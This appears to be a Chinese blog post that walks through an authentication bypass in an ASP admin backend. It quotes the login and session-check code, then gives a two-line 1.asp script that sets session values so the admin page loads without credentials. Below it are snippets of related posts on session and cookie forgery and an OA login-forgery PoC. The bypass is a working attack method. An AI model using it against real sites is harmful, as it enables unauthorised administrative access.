伪造Session登陆后台~

最新推荐文章于 2024-03-12 17:26:40 发布
最新推荐文章于 2024-03-12 17:26:40 发布
阅读量4.8k 收藏
点赞数
分类专栏: 经验交流 文章标签: session user cmd
login.asp的验证代码

<%    dim user_name,user_password,upwr,uID,ukey,cmd,rs
      user_name=trim(request.form("uid"))
      user_password=trim(request.form("pwd"))      
      user_password=jk_md5(user_password,"long")
   if user_name="" or user_password="" then
      close_conn
      response.redirect "../global/systeminfo.asp?flag=1"
   end if  
如果用户和密码为空就返回global/systeminfo.asp?flag=1  这个页面提示"错误帐号或密码,请重新登陆"
在往下看代码

   session("UID")=rs("UserName")
      session("power")=rs("Power")
      Session("PSW")=rs("PSW")
       rs.close:set rs=Nothing
      set cmd=Nothing
      close_conn
      response.redirect("../system/default.asp")        


如果UID,,power.PSW不为空就返回system/default.asp登陆成功

checkuser.asp代码为
<%
   
   if session("UID")="" then
      response.redirect "../gobal/systeminfo.asp?flag=1"
      response.end
   end if  
%>

session("UID")为空同样返回gobal/systeminfo.asp?flag=1
那也就是说只要UID参数不为空就登陆成功

然后把以下代码保存为1.asp


<%
session("UID")="1"
Session("Power")="1"
%>

先访问1.asp..然后再访问后台system/default.asp..绕过了验证..看到了后台管理页面
 
Jeremyzhou
关注
专栏目录
【Web安全】利用burp抓包和CSRF伪造入admin真实后台
李响
03-21 1650
文章目录1 CSRF2 HTTP头部之host和referer2.1 host2.2 referer3 开始抓包3.1 先一直测试到最后观察3.2 修改referer或host,开始渗透 1 CSRF CSRF(Cross Site Request Forgery) 跨站请求伪造。也被称为One Click Attack和Session Riding,通常缩写为CSRF或XSRF。如果从名字你还不...
APP登录----伪sessionId设计登录
u010235716的博客
06-20 2780
我在以前的一篇博客中,瞎说了app和服务端sessionId传递的设计,也没有深入的理解; sessionId这玩意只会存在web服务,也就是B/S架构的体系; 以微信登录来看一个案例,伪sessionId设计登录状态设计; 先注册,再登录哈。这里只说登录;有了sessionId,方便以后的登录验证。 设计思路: 1.APP端传入服务端微信ID:wechatId;
Session伪造记录
qq_49422880的博客
09-05 4723
session与cookie的区别 cookie数据保存在客户端,session数据保存在服务端。 session 简单的说,当你登陆一个网站的时候,如果web服务器端使用的是session,那么所有的数据都保存在服务器上,客户端每次请求服务器的时候会发送当前会话sessionid,服务器根据当前sessionid判断相应的用户数据标志,以确定用户是否登陆或具有某种权限。由于数据是存储在服务器上面,所以你不能伪造。 cookie sessionid是服务器和客户端连接时候随机分配的,如果浏览器使用的是coo
flask session伪造
SwBack的博客
07-31 664
通过CTF题目行学习首先打开题目,查看源代码发下如下注(提)释(示)看到这个,有经验的大佬们估计可以猜到,八成这题就是要伪造admin登录习惯性尝试一波弱口令,admin/admin admin/123456 结果肯定是失败的,随便注册一个账号登录登录,查看页面的功能及源代码,是否存在提示在change页面发现源代码地址看到flask,在根据之前的注释,想到考点应该是flask cookie伪造...
通达前台任意用户session伪造+后台getshell
m_ing
08-27 1298
前言:通达OA是一套办公系统。2020年04月17日, 通达OA官方在更新了一个v11版本安全补丁, 其中修复了一个任意用户伪造登录漏洞。 该漏洞类型为任意用户伪造,未经授权的远程攻击者可以通过精心构造的请求包行任意用户伪造登录,包括admin 漏洞影响版本:通达OA < 11.5.200417 版本 准备条件: m_ing是此次利用的poc,目标的url直接写在url.txt中,vuln.txt是输出结果 运行脚本需要python3环境,python m_ing.py时会出现报错需要安装相应的
session伪造
十一.的博客
10-17 328
session伪造 pin泄露console命令。
通达OA前台伪造管理登陆cookie生成tongda.py
05-07
通达OA 前台伪造管理员登陆漏洞的cookie生成脚本,可以用以生成PHPsessionid,然后替换cookie,从而登陆通达OA后台
php中使用session防止用户非法登录后台的方法
10-24
session机制在防止非法登录中起到了关键作用,它不但可以防止未登录用户访问受保护的页面,还可以避免如CSRF(跨站请求伪造)等安全风险,因为每次请求都需要验证session的有效性。此外,开发者还可以设置session的...
漂亮的后台login登陆html模板_漂亮 后台 登陆 login 表单.rar
04-28
标题中的“漂亮的后台login登陆html模板_漂亮 后台 登陆 login 表单.rar”表明这是一个HTML模板,专用于创建美观的后台登录界面。在Web开发中,登录页面是用户首次接触应用或网站的重要环节,因此设计必须吸引人且...
网站后台登陆页面代码
03-24
网站后台登陆页面是每个Web应用不可或缺的部分,它为管理员提供了安全访问网站管理功能的入口。在本主题中,我们将深入探讨“网站后台登陆页面代码”的关键知识点,包括页面设计、前端开发、后端验证以及安全性考量...
php跨域提交及伪造SeSSION
09-25
一个基于php的跨域提交伪造数据的东东,有待于改
tomcat修改sessionId
10-28
tomcat修改sessionId,同一台服务器部署多个tomcat需要修改sessionId,否则会出现session冲突的问题
Flask之session伪造
TenG的博客
05-22 4063
前言 本文结合CTF中遇到的题目来说一下session伪造,虽然已经有很多师傅写了,而且写的都特别好,但是还是想自己记录一下,也方便以后复习。ciscn中就有一个session伪造的题,由于之前没有做过就没做出来,还是有点遗憾的。但比较戏剧性的是,上午比赛刚结束,下午刷BUU的时候就遇到了同样的题目。嗐,还是自己太菜,下面就结合BUUCTF中的[HCTF 2018]admin来说一下,文中比较拙劣的地方还请师傅们指正一下。参考文章 正文 本来这个题是有三种解法的,分别是:flask session伪造、Un
Flask之session伪造(从某平台学习Session身份伪造)
热门推荐
Y4tacker的博客
08-02 1万+
文章目录工具介绍FLASK解密FLASK加密脚本 工具介绍 FLASK解密 不推荐网上那个,反而这个倒是挺好用 #!/usr/bin/env python3 import sys import zlib from base64 import b64decode from flask.sessions import session_json_serializer from itsdangerous import base64_decode def decryption(payload): payl
为idhttp伪造session
baduan2162的博客
01-30 218
很多网站使用了session来 记录用户登录状态,idhttp本身是不记录session的, 需要通过一些技术手段来伪造session。以Get为例,idhttp伪造session IdHttp1.Get(mURL1); mStr := IdHttp1.Response.CustomHeaders.Values['Set-Cookie']; if Pos(';',mSt...
java sessionid 传递_Java中前台往后台传递多个id参数的实例
weixin_39830917的博客
02-24 470
1.传字符串的形式,字符串中每个id用 “,” 隔开打印出来如下形式:前台JS代码function saveRoleAdd(){var roleNames = $('#roleNames').textbox("getText");var roleDetail = {};roleDetail.roleNames = roleNames;roleDetail.roleFunctionCount = 0...
传销站经典案例之篡改cookie后台
无心的博客
12-03 1043
在传销站发现了一个比较有意思的代码,他的后台登陆是有很大的问题,采用了cookie去判断用户是否登陆 首先,先来看一下它是如何判断登陆的 看到这个,我想,大家应该都明白是什么情况了 它先获取了cookie中‘denglu’中的字段,然后判断其中是否存在’userid‘,如果存在,就提示已经登陆,然后跳转到后台主页面 我们接着往下翻,翻到判断登陆的代码 我们只关注它在登陆成功的时候,做了什么事情...
COOKIES欺骗通杀漏洞后台
weixin_34112181的博客
07-16 372
在谷歌里搜索:inurl:news_more.asp?lm2=搜索到如下站点:http://www.*********/news_more.asp?lm2=1691.将“/news_more.asp?lm2=169”替换成“/admin/admin_news_pl_view.asp?id=1”2.将 |'+dfirst("[user]","[admin]")+chr(124)...
session,PIN码伪造学习(py flask)
最新发布
oyf3085227433的博客
03-12 2348
学习一下伪造session,PIN码的知识
74CMS v5.0.1 后台 CSRF 漏洞分析与复现
"74cms v5.0.1 后台存在跨站请求伪造(CSRF)漏洞,CVE编号CVE-2019-11374。攻击者可利用此漏洞诱使管理员执行恶意操作,创建新的后台管理员账户,获取系统控制权。受影响的版本仅为74CMS v5.0.1。" ### 漏洞详解 ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值